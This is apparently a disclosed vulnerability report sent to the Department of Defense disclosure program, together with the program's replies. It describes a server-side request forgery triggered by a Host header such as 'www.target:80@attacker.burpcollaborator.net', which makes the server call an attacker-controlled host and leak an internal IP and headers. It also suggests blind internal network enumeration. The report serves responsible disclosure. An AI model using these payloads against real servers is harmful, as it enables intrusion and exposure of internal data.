Summary:
A server side request forgery vulnerability appears to leak an internal IP address and tries to connect to an attacker controlled host.
Description:
In an normal request on this web pageGET /HTTP/1.1It will connect to the website as expected but if we use a @ on the host header like this
Host: www.████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG; googtrans=/en/zh-TW
Connection: close
Upgrade-Insecure-Requests: 1
GET / HTTP/1.1
Host: www.█████████:80@██████████.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
It'll attempt to connect to our website and leak various information.
On our server we would see this,
GET / HTTP/1.1
Host: ████████.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG
X--------------: 1.1.1.1
Accept-Encoding: gzip, deflate, identity
Connection: Keep-Alive
Authorization: Basic d3d3LnZpLm5nYi5hcm15Lm1pbDo4MA==
X-BlueCoat-Via: 913daace1d652c00
Additionally we will see a DNS look up from this IP, 214.72.0.2 Which I confirmed to be DOD owned
Impact
Medium
Step-by-step Reproduction Instructions
We can reproduce this simply using www.████:80@yourhostname.com for the host header and we'll the see the results. As seen below
GET / HTTP/1.1
Host: www.████:80@yourwebsite.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
If you have burp suite pro, you can do this easily with burp collaborator
Product, Version, and Configuration (If applicable)
N/a
Suggested Mitigation/Remediation Actions
Refuse attempts to connect to other hosts.
Impact
This will allow attackers to gain access to an internal IP of a DOD website along with other sensitive information that may be leaked with the request
Greetings from the Department of Defense (DoD),
Thank you for supporting the DoD Vulnerability Disclosure Program (VDP).
By submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.
The VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.
We will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.
Our goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.
Regards,
The VDP Team
Greetings @alyssa_herrera,
To validate the reported vulnerability, we require additional information.
Can you please answer the following questions?
Which information do you deem sensitive? Also please provide screenshot(s) or screen recording to illustrate the issue so we can clearly understand the issue you are reporting.
I will continue processing your report on receipt of your response. You will receive another status update upon completion of this review. If I have any other questions in the interim, I will be back in touch.
If we do not receive a response within two weeks, we will send you a second request for this information. If we do not receive a response from you within two weeks of the second notice, we will have to close this report without action.
If you have any questions, please let me know.
Thanks again for supporting the DoD Vulnerability Disclosure Program.
Regards,
This is quite similar to #277450 and with the same issue.
Whois for both ip's
Source: whois.arin.net
IP Address: ██████
Name: ███
Handle: ███████
Registration Date: █████
Range: ████
Org: ████████
Org Handle: ███
Address: ██████
City: ████████
State/Province: ████
Postal Code: █████
Country: United States
Name Servers:
Source: whois.arin.net
IP Address: █████
Name: ███
Handle: ███
Registration Date: █████
Range: ████
Org: Headquarters, █████████
Org Handle: ████████
Address: ████
City: ███
State/Province: ███████
Postal Code: █████
Country: United States
Name Servers:
Greetings,
We have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.
Thank you for bringing this vulnerability to our attention!
We will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.
You will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.
Thanks again for supporting the DoD Vulnerability Disclosure Program.
Regards,
The VDP Team
Hello, i'd like to give a bit of an update on this exploit. I figured out we can perform blind SSRF using this exploit.
If we use an https enabled website, We can trigger an SSL error which leads me to believe this website has the necessary capability to connect to other military websites either through the intranet or through clearnet. If we can query known military DNS it'll time out confirming it exists. I can do this with any DoD IP thus an attacker can enumerate the DoD internal infrastructure. I hope this is enough to bump the severity up a bit. Additionally We can use an IP I was able to pull from another report of mine to prove this theory,
If we use www.██████████:80@████████
We can use this to tunnel into internal networks and access intranet servers which I assume is accessible to NIPERNET if my understanding of the DoD intranet is correct
Good news!
The vulnerability you reported has been resolved and this report is now closed. If you have any further questions or disagree that the report is resolved, please let us know.
Thank you for your time and effort to improve the security of the DoD information network.
Regards,
The VDP Team
